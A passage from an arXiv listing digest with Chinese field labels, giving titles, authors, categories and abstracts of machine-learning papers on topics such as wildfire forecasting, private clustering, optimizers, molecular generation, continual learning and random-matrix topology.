Abstract:This study presents a probabilistic surrogate model for localized wildfire spread based on a conditional flow matching algorithm. The approach models fire progression as a stochastic process by learning the conditional distribution of fire arrival times given the current fire state along with environmental and atmospheric inputs. Model inputs include current burned area, near-surface wind components, temperature, relative humidity, terrain height, and fuel category information, all defined on a high-resolution spatial grid. The outputs are samples of arrival time within a three-hour time window, conditioned on the input variables. Training data are generated from coupled atmosphere-wildfire spread simulations using WRF-SFIRE, paired with weather fields from the North American Mesoscale model. The proposed framework enables efficient generation of ensembles of arrival times and explicitly represents uncertainty arising from incomplete knowledge of the fire-atmosphere system and unresolved variables. The model supports localized prediction over subdomains, reducing computational cost relative to physics-based simulators while retaining sensitivity to key drivers of fire spread. Model performance is evaluated against WRF-SFIRE simulations for both single-step (3-hour) and recursive multi-step (24-hour) forecasts. Results demonstrate that the method captures variability in fire evolution and produces accurate ensemble predictions. The framework provides a scalable approach for probabilistic wildfire forecasting and offers a pathway for integrating machine learning models with operational fire prediction systems and data assimilation.
[LG-99] Neural Approximation of Generalized Voronoi Diagrams
链接: https://arxiv.org/abs/2603.26964
作者: Panagiotis Rigas,George Ioannakis,Ioannis Emiris
类目: Computational Geometry (cs.CG); Machine Learning (cs.LG)
*备注:
Abstract:We introduce VoroFields, a hierarchical neural-field framework for approximating generalized Voronoi diagrams of finite geometric site sets in low-dimensional domains under arbitrary evaluable point-to-site distances. Instead of constructing the diagram combinatorially, VoroFields learns a continuous, differentiable surrogate whose maximizer structure induces the partition implicitly. The Voronoi cells correspond to maximizer regions of the field, with boundaries defined by equal responses between competing sites. A hierarchical decomposition reduces the combinatorial complexity by refining only near envelope transition strata. Experiments across site families and metrics demonstrate accurate recovery of cells and boundary geometry without shape-specific constructions.
[LG-100] On the Optimal Number of Grids for Differentially Private Non-Interactive K-Means Clustering
链接: https://arxiv.org/abs/2603.26963
作者: Gokularam Muthukrishnan,Anshoo Tandon
类目: Cryptography and Security (cs.CR); Machine Learning (cs.LG); Signal Processing (eess.SP); Machine Learning (stat.ML)
*备注:
Abstract:Differentially private K -means clustering enables releasing cluster centers derived from a dataset while protecting the privacy of the individuals. Non-interactive clustering techniques based on privatized histograms are attractive because the released data synopsis can be reused for other downstream tasks without additional privacy loss. The choice of the number of grids for discretizing the data points is crucial, as it directly controls the quantization bias and the amount of noise injected to preserve privacy. The widely adopted strategy selects a grid size that is independent of the number of clusters and also relies on empirical tuning. In this work, we revisit this choice and propose a refined grid-size selection rule derived by minimizing an upper bound on the expected deviation in the K-means objective function, leading to a more principled discretization strategy for non-interactive private clustering. Compared to prior work, our grid resolution differs both in its dependence on the number of clusters and in the scaling with dataset size and privacy budget. Extensive numerical results elucidate that the proposed strategy results in accurate clustering compared to the state-of-the-art techniques, even under tight privacy budgets.
[LG-101] High dimensional theory of two-phase optimizers
链接: https://arxiv.org/abs/2603.26954
作者: Atish Agarwala
类目: Machine Learning (cs.LG); Statistics Theory (math.ST)
*备注:
Abstract:The trend towards larger training setups has brought a renewed interest in partially asynchronous two-phase optimizers which optimize locally and then synchronize across workers. Additionally, recent work suggests that the one-worker version of one of these algorithms, DiLoCo, shows promising results as a (synchronous) optimizer. Motivated by these studies we present an analysis of LA-DiLoCo, a simple member of the DiLoCo family, on a high-dimensional linear regression problem. We show that the one-worker variant, LA, provides a different tradeoff between signal and noise than SGD, which is beneficial in many scenarios. We also show that the multi-worker version generates more noise than the single worker version, but that this additional noise generation can be ameliorated by appropriate choice of hyperparameters. We conclude with an analysis of SLA – LA with momentum – and show that stacking two momentum operators gives an opportunity for acceleration via a non-linear transformation of the "effective’’ Hessian spectrum, which is maximized for Nesterov momentum. Altogether our results show that two-phase optimizers represent a fruitful new paradigm for understanding and improving training algorithms.
[LG-102] unable Domain Adaptation Using Unfolding
链接: https://arxiv.org/abs/2603.26931
作者: Snehaa Reddy,Jayaprakash Katual,Satish Mulleti
类目: Machine Learning (cs.LG)
*备注:
Abstract:Machine learning models often struggle to generalize across domains with varying data distributions, such as differing noise levels, leading to degraded performance. Traditional strategies like personalized training, which trains separate models per domain, and joint training, which uses a single model for all domains, have significant limitations in flexibility and effectiveness. To address this, we propose two novel domain adaptation methods for regression tasks based on interpretable unrolled networks–deep architectures inspired by iterative optimization algorithms. These models leverage the functional dependence of select tunable parameters on domain variables, enabling controlled adaptation during inference. Our methods include Parametric Tunable-Domain Adaptation (P-TDA), which uses known domain parameters for dynamic tuning, and Data-Driven Tunable-Domain Adaptation (DD-TDA), which infers domain adaptation directly from input data. We validate our approach on compressed sensing problems involving noise-adaptive sparse signal recovery, domain-adaptive gain calibration, and domain-adaptive phase retrieval, demonstrating improved or comparable performance to domain-specific models while surpassing joint training baselines. This work highlights the potential of unrolled networks for effective, interpretable domain adaptation in regression settings.
[LG-103] Water-Filling is Universally Minimax Optimal
链接: https://arxiv.org/abs/2603.26893
作者: Siddhartha Banerjee,Ramiro N. Deo-Campo Vuong,Robert Kleinberg
类目: Data Structures and Algorithms (cs.DS); Computer Science and Game Theory (cs.GT); Machine Learning (cs.LG)
*备注:
Abstract:Allocation of dynamically-arriving (i.e., online) divisible resources among a set of offline agents is a fundamental problem, with applications to online marketplaces, scheduling, portfolio selection, signal processing, and many other areas. The water-filling algorithm, which allocates an incoming resource to maximize the minimum load of compatible agents, is ubiquitous in many of these applications whenever the underlying objectives prefer more balanced solutions; however, the analysis and guarantees differ across settings. We provide a justification for the widespread use of water-filling by showing that it is a universally minimax optimal policy in a strong sense. Formally, our main result implies that water-filling is minimax optimal for a large class of objectives – including both Schur-concave maximization and Schur-convex minimization – under \alpha -regret and competitive ratio measures. This optimality holds for every fixed tuple of agents and resource counts. Remarkably, water-filling achieves these guarantees as a myopic policy, remaining entirely agnostic to the objective function, agent count, and resource availability. Our techniques notably depart from the popular primal-dual analysis of online algorithms, and instead develop a novel way to apply the theory of majorization in online settings to achieve universality guarantees. Subjects: Data Structures and Algorithms (cs.DS); Computer Science and Game Theory (cs.GT); Machine Learning (cs.LG) Cite as: arXiv:2603.26893 [cs.DS] (or arXiv:2603.26893v1 [cs.DS] for this version) https://doi.org/10.48550/arXiv.2603.26893 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-104] Property-Guided Molecular Generation and Optimization via Latent Flows ICLR2026
链接: https://arxiv.org/abs/2603.26889
作者: Alexander Arjun Lobo,Urvi Awasthi,Leonid Zhukov
类目: Machine Learning (cs.LG); Materials Science (cond-mat.mtrl-sci)
*备注: 25 pages, 18 figures. Accepted to ICLR 2026 AI4Mat Workshop
Abstract:Molecular discovery is increasingly framed as an inverse design problem: identifying molecular structures that satisfy desired property profiles under feasibility constraints. While recent generative models provide continuous latent representations of chemical space, targeted optimization within these representations often leads to degraded validity, loss of structural fidelity, or unstable behavior. We introduce MoltenFlow, a modular framework that combines property-organized latent representations with flow-matching generative priors and gradient-based guidance. This formulation supports both conditioned generation and local optimization within a single latent-space framework. We show that guided latent flows enable efficient multi-objective molecular optimization under fixed oracle budgets with controllable trade-offs, while a learned flow prior improves unconditional generation quality.
[LG-105] A Hierarchical Sheaf Spectral Embedding Framework for Single-Cell RNA-seq Analysis
链接: https://arxiv.org/abs/2603.26858
作者: Xiang Xiang Wang,Guo-Wei We
类目: Machine Learning (cs.LG); Spectral Theory (math.SP); Genomics (q-bio.GN); Machine Learning (stat.ML)
*备注:
Abstract:Single-cell RNA-seq data analysis typically requires representations that capture heterogeneous local structure across multiple scales while remaining stable and interpretable. In this work, we propose a hierarchical sheaf spectral embedding (HSSE) framework that constructs informative cell-level features based on persistent sheaf Laplacian analysis. Starting from scale-dependent low-dimensional embeddings, we define cell-centered local neighborhoods at multiple resolutions. For each local neighborhood, we construct a data-driven cellular sheaf that encodes local relationships among cells. We then compute persistent sheaf Laplacians over sampled filtration intervals and extract spectral statistics that summarize the evolution of local relational structure across scales. These spectral descriptors are aggregated into a unified feature vector for each cell and can be directly used in downstream learning tasks without additional model training. We evaluate HSSE on twelve benchmark single-cell RNA-seq datasets covering diverse biological systems and data scales. Under a consistent classification protocol, HSSE achieves competitive or improved performance compared with existing multiscale and classical embedding-based methods across multiple evaluation metrics. The results demonstrate that sheaf spectral representations provide a robust and interpretable approach for single-cell RNA-seq data representation learning.
[LG-106] Stringological sequence prediction I: efficient algorithms for predicting highly repetitive sequences
链接: https://arxiv.org/abs/2603.26852
作者: Vanessa Kosoy
类目: Formal Languages and Automata Theory (cs.FL); Data Structures and Algorithms (cs.DS); Machine Learning (cs.LG)
*备注: 43 pages
Abstract:We propose novel algorithms for sequence prediction based on ideas from stringology. These algorithms are time and space efficient and satisfy mistake bounds related to particular stringological complexity measures of the sequence. In this work (the first in a series) we focus on two such measures: (i) the size of the smallest straight-line program that produces the sequence, and (ii) the number of states in the minimal automaton that can compute any symbol in the sequence when given its position in base k as input. These measures are interesting because multiple rich classes of sequences studied in combinatorics of words (automatic sequences, morphic sequences, Sturmian words) have low complexity and hence high predictability in this sense.
[LG-107] A Comparative Investigation of Thermodynamic Structure-Informed Neural Networks
链接: https://arxiv.org/abs/2603.26803
作者: Guojie Li,Liu Hong
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: 30 pages, 9 figures, 2 tables
Abstract:Physics-informed neural networks (PINNs) offer a unified framework for solving both forward and inverse problems of differential equations, yet their performance and physical consistency strongly depend on how governing laws are incorporated. In this work, we present a systematic comparison of different thermodynamic structure-informed neural networks by incorporating various thermodynamics formulations, including Newtonian, Lagrangian, and Hamiltonian mechanics for conservative systems, as well as the Onsager variational principle and extended irreversible thermodynamics for dissipative systems. Through comprehensive numerical experiments on representative ordinary and partial differential equations, we quantitatively evaluate the impact of these formulations on accuracy, physical consistency, noise robustness, and interpretability. The results show that Newtonian-residual-based PINNs can reconstruct system states but fail to reliably recover key physical and thermodynamic quantities, whereas structure-preserving formulation significantly enhances parameter identification, thermodynamic consistency, and robustness. These findings provide practical guidance for principled design of thermodynamics-consistency model, and lay the groundwork for integrating more general nonequilibrium thermodynamic structures into physics-informed machine learning.
[LG-108] Gaussian Joint Embeddings For Self-Supervised Representation Learning
链接: https://arxiv.org/abs/2603.26799
作者: Yongchao Huang
类目: Machine Learning (cs.LG)
*备注: 92 pages
Abstract:Self-supervised representation learning often relies on deterministic predictive architectures to align context and target views in latent space. While effective in many settings, such methods are limited in genuinely multi-modal inverse problems, where squared-loss prediction collapses towards conditional averages, and they frequently depend on architectural asymmetries to prevent representation collapse. In this work, we propose a probabilistic alternative based on generative joint modeling. We introduce Gaussian Joint Embeddings (GJE) and its multi-modal extension, Gaussian Mixture Joint Embeddings (GMJE), which model the joint density of context and target representations and replace black-box prediction with closed-form conditional inference under an explicit probabilistic model. This yields principled uncertainty estimates and a covariance-aware objective for controlling latent geometry. We further identify a failure mode of naive empirical batch optimization, which we term the Mahalanobis Trace Trap, and develop several remedies spanning parametric, adaptive, and non-parametric settings, including prototype-based GMJE, conditional Mixture Density Networks (GMJE-MDN), topology-adaptive Growing Neural Gas (GMJE-GNG), and a Sequential Monte Carlo (SMC) memory bank. In addition, we show that standard contrastive learning can be interpreted as a degenerate non-parametric limiting case of the GMJE framework. Experiments on synthetic multi-modal alignment tasks and vision benchmarks show that GMJE recovers complex conditional structure, learns competitive discriminative representations, and defines latent densities that are better suited to unconditional sampling than deterministic or unimodal baselines.
[LG-109] MemGuard-Alpha: Detecting and Filtering Memorization-Contaminated Signals in LLM -Based Financial Forecasting via Membership Inference and Cross-Model Disagreement
链接: https://arxiv.org/abs/2603.26797
作者: Anisha Roy,Dip Roy
类目: Machine Learning (cs.LG)
*备注:
Abstract:Large language models (LLMs) are increasingly used to generate financial alpha signals, yet growing evidence shows that LLMs memorize historical financial data from their training corpora, producing spurious predictive accuracy that collapses out-of-sample. This memorization-induced look-ahead bias threatens the validity of LLM-based quantitative strategies. Prior remedies – model retraining and input anonymization – are either prohibitively expensive or introduce significant information loss. No existing method offers practical, zero-cost signal-level filtering for real-time trading. We introduce MemGuard-Alpha, a post-generation framework comprising two algorithms: (i) the MemGuard Composite Score (MCS), which combines five membership inference attack (MIA) methods with temporal proximity features via logistic regression, achieving Cohen’s d = 18.57 for contamination separation (d = 0.39-1.37 using MIA features alone); and (ii) Cross-Model Memorization Disagreement (CMMD), which exploits variation in training cutoff dates across LLMs to separate memorized signals from genuine reasoning. Evaluated across seven LLMs (124M-7B parameters), 50 SP 100 stocks, 42,800 prompts, and five MIA methods over 5.5 years (2019-2024), CMMD achieves a Sharpe ratio of 4.11 versus 2.76 for unfiltered signals (49% improvement). Clean signals produce 14.48 bps average daily return versus 2.13 bps for tainted signals (7x difference). A striking crossover pattern emerges: in-sample accuracy rises with contamination (40.8% to 52.5%) while out-of-sample accuracy falls (47% to 42%), providing direct evidence that memorization inflates apparent accuracy at the cost of generalization.
[LG-110] Efficient Encrypted Computation in Convolutional Spiking Neural Networks with TFHE
链接: https://arxiv.org/abs/2603.26781
作者: Longfei Guo,Pengbo Li,Ting Gao,Yonghai Zhong,Haojie Fan,Jinqiao Duan
类目: Cryptography and Security (cs.CR); Machine Learning (cs.LG)
*备注:
Abstract:With the rapid advancement of AI technology, we have seen more and more concerns on data privacy, leading to some cutting-edge research on machine learning with encrypted computation. Fully Homomorphic Encryption (FHE) is a crucial technology for privacy-preserving computation, while it struggles with continuous non-polynomial functions, as it operates on discrete integers and supports only addition and multiplication. Spiking Neural Networks (SNNs), which use discrete spike signals, naturally complement FHE’s characteristics. In this paper, we introduce FHE-DiCSNN, a framework built on the TFHE scheme, utilizing the discrete nature of SNNs for secure and efficient computations. By leveraging bootstrapping techniques, we successfully implement Leaky Integrate-and-Fire (LIF) neuron models on ciphertexts, allowing SNNs of arbitrary depth. Our framework is adaptable to other spiking neuron models, offering a novel approach to homomorphic evaluation of SNNs. Additionally, we integrate convolutional methods inspired by CNNs to enhance accuracy and reduce the simulation time associated with random encoding. Parallel computation techniques further accelerate bootstrapping operations. Experimental results on the MNIST and FashionMNIST datasets validate the effectiveness of FHE-DiCSNN, with a loss of less than 3% compared to plaintext, respectively, and computation times of under 1 second per prediction. We also apply the model into real medical image classification problems and analyze the parameter optimization and selection.
[LG-111] Robot Arm Control via Cognitive Map Learners
链接: https://arxiv.org/abs/2603.26773
作者: Nathan McDonald,Colyn Seeley,Christian Brazeau
类目: Robotics (cs.RO); Machine Learning (cs.LG)
*备注:
Abstract:Cognitive map learners (CML) have been shown to enable hierarchical, compositional machine learning. That is, interpedently trained CML modules can be arbitrarily composed together to solve more complex problems without task-specific retraining. This work applies this approach to control the movement of a multi-jointed robot arm, whereby each arm segment’s angular position is governed by an independently trained CML. Operating in a 2D Cartesian plane, target points are encoded as phasor hypervectors according to fractional power encoding (FPE). This phasor hypervector is then factorized into a set of arm segment angles either via a resonator network or a modern Hopfield network. These arm segment angles are subsequently fed to their respective arm segment CMLs, which reposition the robot arm to the target point without the use of inverse kinematic equations. This work presents both a general solution for both a 2D robot arm with an arbitrary number of arm segments and a particular solution for a 3D arm with a single rotating base.
[LG-112] Evolutionary Warm-Starts for Reinforcement Learning in Industrial Continuous Control
链接: https://arxiv.org/abs/2603.26750
作者: Tom Maus,Stephan Frank,Tobias Glasmachers
类目: Neural and Evolutionary Computing (cs.NE); Machine Learning (cs.LG)
*备注: 4 pages, 2 figures
Abstract:Reinforcement learning (RL) is still rarely applied in industrial control, partly due to the difficulty of training reliable agents for real-world conditions. This work investigates how evolution strategies can support RL in such settings by introducing a continuous-control adaptation of an industrial sorting benchmark. The CMA-ES algorithm is used to generate high-quality demonstrations that warm-start RL agents. Results show that CMA-ES-guided initialization significantly improves stability and performance. Furthermore, the demonstration trajectories generated with the CMA-ES provide a strong oracle reference performance level, which is of interest in its own right. The study delivers a focused proof of concept for hybrid evolutionary-RL approaches and a basis for future, more complex industrial applications.
[LG-113] Mixture of Experts with Soft Nearest Neighbor Loss: Resolving Expert Collapse via Representation Disentanglement
链接: https://arxiv.org/abs/2603.26734
作者: Abien Fred Agarap,Arnulfo P. Azcarraga
类目: Neural and Evolutionary Computing (cs.NE); Machine Learning (cs.LG)
*备注: 7 pages, 7 figures, accepted for oral presentation at the Philippine Computing Science Congress 2026
Abstract:The Mixture-of-Experts (MoE) model uses a set of expert networks that specialize on subsets of a dataset under the supervision of a gating network. A common issue in MoE architectures is ``expert collapse’’ where overlapping class boundaries in the raw input feature space cause multiple experts to learn redundant representations, thus forcing the gating network into rigid routing to compensate. We propose an enhanced MoE architecture that utilizes a feature extractor network optimized using Soft Nearest Neighbor Loss (SNNL) prior to feeding input features to the gating and expert networks. By pre-conditioning the latent space to minimize distances among class-similar data points, we resolve structural expert collapse which results to experts learning highly orthogonal weights. We employ Expert Specialization Entropy and Pairwise Embedding Similarity to quantify this dynamic. We evaluate our experimental approach across four benchmark image classification datasets (MNIST, FashionMNIST, CIFAR10, and CIFAR100), and we show our SNNL-augmented MoE models demonstrate structurally diverse experts which allow the gating network to adopt a more flexible routing strategy. This paradigm significantly improves classification accuracy on the FashionMNIST, CIFAR10, and CIFAR100 datasets.
[LG-114] Boundary-aware Prototype-driven Adversarial Alignment for Cross-Corpus EEG Emotion Recognition
链接: https://arxiv.org/abs/2603.26713
作者: Guangli Li,Canbiao Wu,Na Tian,Li Zhang,Zhen Liang
类目: Machine Learning (cs.LG); Signal Processing (eess.SP); Machine Learning (stat.ML)
*备注:
Abstract:Electroencephalography (EEG)-based emotion recognition suffers from severe performance degradation when models are transferred across heterogeneous datasets due to physiological variability, experimental paradigm differences, and device inconsistencies. Existing domain adversarial methods primarily enforce global marginal alignment and often overlook class-conditional mismatch and decision boundary distortion, limiting cross-corpus generalization. In this work, we propose a unified Prototype-driven Adversarial Alignment (PAA) framework for cross-corpus EEG emotion recognition. The framework is progressively instantiated in three configurations: PAA-L, which performs prototype-guided local class-conditional alignment; PAA-C, which further incorporates contrastive semantic regularization to enhance intra-class compactness and inter-class separability; and PAA-M, the full boundary-aware configuration that integrates dual relation-aware classifiers within a three-stage adversarial optimization scheme to explicitly refine controversial samples near decision boundaries. By combining prototype-guided subdomain alignment, contrastive discriminative enhancement, and boundary-aware aggregation within a coherent adversarial architecture, the proposed framework reformulates emotion recognition as a relation-driven representation learning problem, reducing sensitivity to label noise and improving cross-domain stability. Extensive experiments on SEED, SEED-IV, and SEED-V demonstrate state-of-the-art performance under four cross-corpus evaluation protocols, with average improvements of 6.72%, 5.59%, 6.69%, and 4.83%, respectively. Furthermore, the proposed framework generalizes effectively to clinical depression identification scenarios, validating its robustness in real-world heterogeneous settings. The source code is available at \textitthis https URL
[LG-115] Mitigating Forgetting in Continual Learning with Selective Gradient Projection
链接: https://arxiv.org/abs/2603.26671
作者: Anika Singh,Aayush Dhaulakhandi,Varun Chopade,Likhith Malipati,David Martinez,Kevin Zhu
类目: Machine Learning (cs.LG); Optimization and Control (math.OC)
*备注: 15 pages, 2 figures, Accepted to the Student Research Workshop at International Joint Conference on Natural Language Processing Asia-Pacific Chapter of the Association for Computational Linguistics, 2025
Abstract:As neural networks are increasingly deployed in dynamic environments, they face the challenge of catastrophic forgetting, the tendency to overwrite previously learned knowledge when adapting to new tasks, resulting in severe performance degradation on earlier tasks. We propose Selective Forgetting-Aware Optimization (SFAO), a dynamic method that regulates gradient directions via cosine similarity and per-layer gating, enabling controlled forgetting while balancing plasticity and stability. SFAO selectively projects, accepts, or discards updates using a tunable mechanism with efficient Monte Carlo approximation. Experiments on standard continual learning benchmarks show that SFAO achieves competitive accuracy with markedly lower memory cost, a 90 % reduction, and improved forgetting on MNIST datasets, making it suitable for resource-constrained scenarios.
[LG-116] Functional Natural Policy Gradients
链接: https://arxiv.org/abs/2603.28681
作者: Aurelien Bibaut,Houssam Zenati,Thibaud Rahier,Nathan Kallus
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注:
Abstract:We propose a cross-fitted debiasing device for policy learning from offline data. A key consequence of the resulting learning principle is \sqrt N regret even for policy classes with complexity greater than Donsker, provided a product-of-errors nuisance remainder is O(N^-1/2) . The regret bound factors into a plug-in policy error factor governed by policy-class complexity and an environment nuisance factor governed by the complexity of the environment dynamics, making explicit how one may be traded against the other.
[LG-117] Universal Approximation Constraints of Narrow ResNets: The Tunnel Effect
链接: https://arxiv.org/abs/2603.28591
作者: Christian Kuehn,Sara-Viola Kuntz,Tobias Wöhrer
类目: Dynamical Systems (math.DS); Machine Learning (cs.LG)
*备注:
Abstract:We analyze the universal approximation constraints of narrow Residual Neural Networks (ResNets) both theoretically and numerically. For deep neural networks without input space augmentation, a central constraint is the inability to represent critical points of the input-output map. We prove that this has global consequences for target function approximations and show that the manifestation of this defect is typically a shift of the critical point to infinity, which we call the ``tunnel effect’’ in the context of classification tasks. While ResNets offer greater expressivity than standard multilayer perceptrons (MLPs), their capability strongly depends on the signal ratio between the skip and residual channels. We establish quantitative approximation bounds for both the residual-dominant (close to MLP) and skip-dominant (close to neural ODE) regimes. These estimates depend explicitly on the channel ratio and uniform network weight bounds. Low-dimensional examples further provide a detailed analysis of the different ResNet regimes and how architecture-target incompatibility influences the approximation error.
[LG-118] Yaus Affine Normal Descent: Algorithmic Framework and Convergence Analysis
链接: https://arxiv.org/abs/2603.28448
作者: Yi-Shuai Niu,Artan Sheshmani,Shing-Tung Yau
类目: Optimization and Control (math.OC); Machine Learning (cs.LG); Differential Geometry (math.DG); Numerical Analysis (math.NA)
*备注: 55 pages, 25 figures
Abstract:We propose Yau’s Affine Normal Descent (YAND), a geometric framework for smooth unconstrained optimization in which search directions are defined by the equi-affine normal of level-set hypersurfaces. The resulting directions are invariant under volume-preserving affine transformations and intrinsically adapt to anisotropic curvature. Using the analytic representation of the affine normal from affine differential geometry, we establish its equivalence with the classical slice-centroid construction under convexity. For strictly convex quadratic objectives, affine-normal directions are collinear with Newton directions, implying one-step convergence under exact line search. For general smooth (possibly nonconvex) objectives, we characterize precisely when affine-normal directions yield strict descent and develop a line-search-based YAND. We establish global convergence under standard smoothness assumptions, linear convergence under strong convexity and Polyak-Lojasiewicz conditions, and quadratic local convergence near nondegenerate minimizers. We further show that affine-normal directions are robust under affine scalings, remaining insensitive to arbitrarily ill-conditioned transformations. Numerical experiments illustrate the geometric behavior of the method and its robustness under strong anisotropic scaling.
[LG-119] LDDMM stochastic interpolants: an application to domain uncertainty quantification in hemodynamics
链接: https://arxiv.org/abs/2603.28324
作者: Sarah Katz,Francesco Romor,Jia-Jie Zhu,Alfonso Caiazzo
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Numerical Analysis (math.NA)
*备注:
Abstract:We introduce a novel conditional stochastic interpolant framework for generative modeling of three-dimensional shapes. The method builds on a recent LDDMM-based registration approach to learn the conditional drift between geometries. By leveraging the resulting pull-back and push-forward operators, we extend this formulation beyond standard Cartesian grids to complex shapes and random variables defined on distinct domains. We present an application in the context of cardiovascular simulations, where aortic shapes are generated from an initial cohort of patients. The conditioning variable is a latent geometric representation defined by a set of centerline points and the radii of the corresponding inscribed spheres. This methodology facilitates both data augmentation for three-dimensional biomedical shapes, and the generation of random perturbations of controlled magnitude for a given shape. These capabilities are essential for quantifying the impact of domain uncertainties arising from medical image segmentation on the estimation of relevant biomarkers.
[LG-120] Learning from imperfect quantum data via unsupervised domain adaptation with classical shadows
链接: https://arxiv.org/abs/2603.28294
作者: Kosuke Ito,Akira Tanji,Hiroshi Yano,Yudai Suzuki,Naoki Yamamoto
类目: Quantum Physics (quant-ph); Machine Learning (cs.LG)
*备注: 23 pages, 6 figures
Abstract:Learning from quantum data using classical machine learning models has emerged as a promising paradigm toward realizing quantum advantages. Despite extensive analyses on their performance, clean and fully labeled quantum data from the target domain are often unavailable in practical scenarios, forcing models to be trained on data collected under conditions that differ from those encountered at deployment. This mismatch highlights the need for new approaches beyond the common assumptions of prior work. In this work, we address this issue by employing an unsupervised domain adaptation framework for learning from imperfect quantum data. Specifically, by leveraging classical representations of quantum states obtained via classical shadows, we perform unsupervised domain adaptation entirely within a classical computational pipeline once measurements on the quantum states are executed. We numerically evaluate the framework on quantum phases of matter and entanglement classification tasks under realistic domain shifts. Across both tasks, our method outperforms source-only non-adaptive baselines and target-only unsupervised learning approaches, demonstrating the practical applicability of domain adaptation to realistic quantum data learning.
[LG-121] Nonlinear Factor Decomposition via Kolmogorov-Arnold Networks: A Spectral Approach to Asset Return Analysis
链接: https://arxiv.org/abs/2603.28257
作者: David Breazu
类目: atistical Finance (q-fin.ST); Machine Learning (cs.LG)
*备注: 12 pages, 2 figures
Abstract:KAN-PCA is an autoencoder that uses a KAN as encoder and a linear map as decoder. It generalizes classical PCA by replacing linear projections with learned B-spline functions on each edge. The motivation is to capture more variance than classical PCA, which becomes inefficient during market crises when the linear assumption breaks down and correlations between assets change dramatically. We prove that if the spline activations are forced to be linear, KAN-PCA yields exactly the same results as classical PCA, establishing PCA as a special case. Experiments on 20 SP 500 stocks (2015-2024) show that KAN-PCA achieves a reconstruction R^2 of 66.57%, compared to 62.99% for classical PCA with the same 3 factors, while matching PCA out-of-sample after correcting for data leakage in the training procedure. Comments: 12 pages, 2 figures Subjects: Statistical Finance (q-fin.ST); Machine Learning (cs.LG) MSC classes: 62H25, 91G70, 68T07 Cite as: arXiv:2603.28257 [q-fin.ST] (or arXiv:2603.28257v1 [q-fin.ST] for this version) https://doi.org/10.48550/arXiv.2603.28257 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[LG-122] ransformer-Based Prognostics: Enhancing Network Availability by Improved Monitoring of Optical Fiber Amplifiers
链接: https://arxiv.org/abs/2603.28081
作者: Dominic Schneider,Lutz Rapp,Christoph Ament
类目: ignal Processing (eess.SP); Machine Learning (cs.LG)
*备注: This paper has been accepted for publication at the Optical Fiber Communication (OFC) Conference 2026
Abstract:We enhance optical network availability and reliability through a lightweight transformer model that predicts optical fiber amplifier lifetime from condition-based monitoring data, enabling real-time, edge-level predictive maintenance and advancing deployable AI for autonomous network operation.
[LG-123] BiFormer3D: Grid-Free Time-Domain Reconstruction of Head-Related Impulse Responses with a Spatially Encoded Transformer INTERSPEECH2026
链接: https://arxiv.org/abs/2603.27998
作者: Shaoheng Xu,Chunyi Sun,Jihui Zhang,Amy Bastine,Prasanga N. Samarasinghe,Thushara D. Abhayapala,Hongdong Li
类目: Audio and Speech Processing (eess.AS); Machine Learning (cs.LG)
*备注: The paper was submitted for review to Interspeech 2026
Abstract:Individualized head-related impulse responses (HRIRs) enable binaural rendering, but dense per-listener measurements are costly. We address HRIR spatial up-sampling from sparse per-listener measurements: given a few measured HRIRs for a listener, predict HRIRs at unmeasured target directions. Prior learning methods often work in the frequency domain, rely on minimum-phase assumptions or separate timing models, and use a fixed direction grid, which can degrade temporal fidelity and spatial continuity. We propose BiFormer3D, a time-domain, grid-free binaural Transformer for reconstructing HRIRs at arbitrary directions from sparse inputs. It uses sinusoidal spatial features, a Conv1D refinement module, and auxiliary interaural time difference (ITD) and interaural level difference (ILD) heads. On SONICOM, it improves normalized mean squared error (NMSE), cosine distance, and ITD/ILD errors over prior methods; ablations validate modules and show minimum-phase pre-processing is unnecessary.
[LG-124] Persistence diagrams of random matrices via Morse theory: universality and a new spectral diagnostic
链接: https://arxiv.org/abs/2603.27903
作者: Matthew Loftus
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Mathematical Physics (math-ph); Algebraic Topology (math.AT)
*备注: 7 pages, 5 figures, 4 tables
Abstract:We prove that the persistence diagram of the sublevel set filtration of the quadratic form f(x) = x^T M x restricted to the unit sphere S^n-1 is analytically determined by the eigenvalues of the symmetric matrix M. By Morse theory, the diagram has exactly n-1 finite bars, with the k-th bar living in homological dimension k-1 and having length equal to the k-th eigenvalue spacing s_k = \lambda_k+1 - \lambda_k. This identification transfers random matrix theory (RMT) universality to persistence diagram universality: for matrices drawn from the Gaussian Orthogonal Ensemble (GOE), we derive the closed-form persistence entropy PE = log(8n/\pi) - 1, and verify numerically that the coefficient of variation of persistence statistics decays as n^-0.6. Different random matrix ensembles (GOE, GUE, Wishart) produce distinct universal persistence diagrams, providing topological fingerprints of RMT universality classes. As a practical consequence, we show that persistence entropy outperforms the standard level spacing ratio \langle r \rangle for discriminating GOE from GUE matrices (AUC 0.978 vs. 0.952 at n = 100, non-overlapping bootstrap 95% CIs), and detects global spectral perturbations in the Rosenzweig-Porter model to which \langle r \rangle is blind. These results establish persistence entropy as a new spectral diagnostic that captures complementary information to existing RMT tools.
[LG-125] Statistical Guarantees for Distributionally Robust Optimization with Optimal Transport and OT-Regularized Divergences
链接: https://arxiv.org/abs/2603.27871
作者: Jeremiah Birrell,Xiaoxi Shen
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注: 24 pages
Abstract:We study finite-sample statistical performance guarantees for distributionally robust optimization (DRO) with optimal transport (OT) and OT-regularized divergence model neighborhoods. Specifically, we derive concentration inequalities for supervised learning via DRO-based adversarial training, as commonly employed to enhance the adversarial robustness of machine learning models. Our results apply to a wide range of OT cost functions, beyond the p -Wasserstein case studied by previous authors. In particular, our results are the first to: 1) cover soft-constraint norm-ball OT cost functions; soft-constraint costs have been shown empirically to enhance robustness when used in adversarial training, 2) apply to the combination of adversarial sample generation and adversarial reweighting that is induced by using OT-regularized f -divergence model neighborhoods; the added reweighting mechanism has also been shown empirically to further improve performance. In addition, even in the p -Wasserstein case, our bounds exhibit better behavior as a function of the DRO neighborhood size than previous results when applied to the adversarial setting.
[LG-126] Empirical Likelihood for Nonsmooth Functionals
链接: https://arxiv.org/abs/2603.27743
作者: Hongseok Namkoong
类目: Methodology (stat.ME); Machine Learning (cs.LG)
*备注:
